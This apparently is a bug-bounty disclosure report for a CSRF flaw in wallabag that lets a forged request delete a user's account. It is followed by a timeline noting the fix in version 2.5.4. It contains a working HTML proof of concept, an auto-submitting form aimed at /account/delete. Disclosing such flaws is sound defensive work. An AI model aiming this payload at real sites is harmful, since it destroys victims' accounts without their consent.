CSRF leading to delete account in wallabag/wallabag

Valid

Reported on

Jan 4th 2023


Description

wallabag was discovered to contain a Cross-Site Request Forgery (CSRF) which allows attackers to arbitrarily delete user accounts via /account/delete.

Proof of Concept

  1. Create a new user.
  2. Login as the new user.
  3. Open the following HTML file in the browser.
<html>
  <!-- CSRF PoC - generated by Burp Suite Professional -->
  <body>
  <script>history.pushState('', '', '/')</script>
    <form action="http://localhost:8000/account/delete">
      <input type="submit" value="Submit request" />
    </form>
    <script>
      document.forms[0].submit();
    </script>
  </body>
</html>

Impact

This vulnerability is capable of tricking a user to delete their own account.

We are processing your report and will contact the wallabag team within 24 hours. a year ago
We have contacted a member of the wallabag team and are waiting to hear back a year ago
Jérémy Benoist validated this vulnerability a year ago
bauh0lz has been awarded the disclosure bounty
The fix bounty is now up for grabs
The researcher's credibility has increased: +7
Jérémy Benoist marked this as fixed in 2.5.4 with commit 268372 a year ago
Jérémy Benoist has been awarded the fix bounty
This vulnerability has now been published a year ago
wallabag/wallabag maintainer gave praise a year ago
Thank you!
The researcher's credibility has slightly increased as a result of the maintainer's thanks: +1
to join this conversation